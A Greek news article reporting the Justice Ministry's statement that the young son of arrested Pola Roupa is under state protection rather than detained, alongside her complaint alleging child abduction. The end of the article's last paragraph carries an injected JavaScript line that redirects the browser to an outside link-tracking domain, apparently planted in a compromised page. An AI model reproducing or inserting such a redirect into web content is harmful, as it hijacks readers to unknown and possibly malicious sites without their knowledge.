Διευκρινίσεις υπ.Δικαιοσύνης: Υπό προστασία το παιδί της Ρούπα, δεν συνελήφθη

0
6

 

Ψευδείς και ανεύθυνες χαρακτηρίζει το υπουργείο Δικαιοσύνης τις αναφορές για την τύχη του εξάχρονου παιδιού της Πόλας Ρούπα, καθώς όπως αναφέρει σε ανακοίνωσή του, ούτε συνελήφθη, ούτε κρατήθηκε, αλλά τέθηκε σε προστασία.

Αξίζει να σημειωθεί ότι η Πόλα Ρούπα κατέθεσε στην Εισαγγελία Πρωτοδικών μηνυτήρια αναφορά κατά παντός υπευθύνου για αρπαγή ανηλίκου. Σύμφωνα με πληροφορίες, σε αυτήν υποστηρίζει ότι οι Αρχές κρατούν τον ανήλικο γιο της από χθες «αρνούμενες να παραδώσουν την επιμέλειά του» στη μητέρα και την αδελφή της, όπως ζητάει η ίδια.

Ειδικότερα, το υπουργείο Δικαιοσύνης σημειώνει ότι το ανήλικο παιδί της 48χρονης συλληφθείσας Πόλας Ρούπα τέθηκε σε προστασία, μέχρι την οριστική ανάθεση της επιμέλειάς του, ενώ παράλληλα παρακολουθείται από εξειδικευμένους επιστήμονες.

Εξάλλου, όπως τονίζει το υπουργείο, ήδη διευθετείται το ζήτημα της σταθερής επικοινωνίας του ανήλικου με τους στενούς συγγενείς του και προσθέτει: «Αυτό που προέχει, είναι να διασφαλιστεί το βέλτιστο συμφέρον του παιδιού, το οποίο θα κρίνουν τα θεσμοθετημένα όργανα, όπως γίνεται σε κάθε όμοια περίπτωση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here